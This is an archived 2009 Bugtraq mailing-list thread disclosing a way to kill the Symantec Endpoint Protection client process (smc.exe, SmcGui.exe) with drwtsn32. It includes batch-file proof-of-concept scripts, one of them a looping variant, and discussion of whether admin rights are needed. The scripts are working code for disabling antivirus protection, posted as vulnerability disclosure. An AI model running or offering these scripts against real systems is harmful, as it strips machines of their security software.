[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <SNT107-DS13F5B92EEE57672B02DAB6C7B80@phx.gbl>
Date: Sat, 14 Feb 2009 01:18:29 +0530
From: "Sandeep Cheema" <51l3n7@...e.in>
To: "David Calabro" <dcalabro@...nsitionalwork.org>,
<bugtraq@...urityfocus.com>
Subject: Re: SEPKILL /im SMC.EXE /f
You are right, but that will require admin privilege. Isn't it ?
Regards, Sandeep
--------------------------------------------------
From: "David Calabro" <dcalabro@...nsitionalwork.org>
Sent: Saturday, February 14, 2009 1:02 AM
To: "'Sandeep Cheema'" <51l3n7@...e.in>; <bugtraq@...urityfocus.com>
Subject: RE: SEPKILL /im SMC.EXE /f
> If the Symantec Management Client service was somehow changed from
> "smc.exe" to "smc.exe -P" it would effectively prevent the service from
> starting in the first place. Correct?
>
> -----Original Message-----
> From: Sandeep Cheema [mailto:51l3n7@...e.in]
> Sent: Friday, February 13, 2009 12:25 PM
> To: bugtraq@...urityfocus.com
> Subject: Re: SEPKILL /im SMC.EXE /f
>
> Just as an update couldn't get any further other than t.he fact that
> SMCGui.exe is getting killed as its running in the user account and
> SMC.exe
> in the system account.
>
> Thank you.
>
> Regards, Sandeep
>
> --------------------------------------------------
> From: "Sandeep Cheema" <51l3n7@...e.in>
> Sent: Friday, February 13, 2009 8:06 PM
> To: <bugtraq@...urityfocus.com>
> Subject: Re: SEPKILL /im SMC.EXE /f
>
>> For the "users" its working for SmcGUI.exe
>>
>> Please find the code as below.
>>
>> :here
>> tasklist | find /i "SmcGui.exe" > c:\pid.txt
>> FOR /F "tokens=2" %%R IN ('TYPE "c:\pid.txt"') DO SET pidopt=%%R
>> drwtsn32 -p %pidopt%
>> goto :here
>>
>> I have tried it and when let this file run for around 2 mins, The
>> SmcGui.exe process loads up when you logoff and log back in (or
>> restart)but the icon does not show up in the taskbar.
>>
>> Thank you.
>>
>> Regards, Sandeep
>>
>> --------------------------------------------------
>> From: "Sandeep Cheema" <51l3n7@...e.in>
>> Sent: Friday, February 13, 2009 7:03 PM
>> To: <bugtraq@...urityfocus.com>
>> Subject: Re: SEPKILL /im SMC.EXE /f
>>
>>> As an update its not happening for "Users" account, Though no access
>>> denied.
>>>
>>> Anyone knows why?
>>>
>>> Thank you.
>>>
>>> Regards, Sandeep
>>>
>>> --------------------------------------------------
>>> From: "Sandeep Cheema" <51l3n7@...e.in>
>>> Sent: Friday, February 13, 2009 6:18 PM
>>> To: <bugtraq@...urityfocus.com>
>>> Subject: SEPKILL /im SMC.EXE /f
>>>
>>>> Hi,
>>>>
>>>> Probably this bug exists on majorly all the software's but security
>>>> software's like antivirus and firewall have to bucket it which is not
>>>> what its for SEP.
>>>> I have tested it on all versions of SEP from 11.0.776 to 11.0.4000(XP
>>>> and 2k3)
>>>>
>>>>
>>>> You can kill smc.exe with the help of drwtsn32.exe in the following
>>>> way.
>>>>
>>>> drwtsn32 -p %pid%
>>>> where pid is the process id for smc.exe
>>>>
>>>> POC:
>>>>
>>>> Save the following as a batch file and execute it
>>>>
>>>> tasklist | find /i "Smc.exe" > c:\pid.txt
>>>> FOR /F "tokens=2" %%R IN ('TYPE "c:\pid.txt"') DO SET pidopt=%%R
>>>> drwtsn32 -p %pidopt%
>>>>
>>>>
>>>>
>>>> You don't need admin privilege for this exploit.
>>>>
>>>> This will even bypass the password if it has been set to stop the
>>>> service.
>>>> If executed from the command line in the form drwtsn32 -p %pid% , the
>>>> command will be executed and it takes some time for the process to be
>>>> stopped.
>>>> If done from a batch file the command is completed only when the
>>>> process
>>>> is stopped.
>>>>
>>>> Regards, Sandeep
>>>> 51l3n7[at]live.in
>>>>
>>>>
>>>>
>
Powered by blists - more mailing lists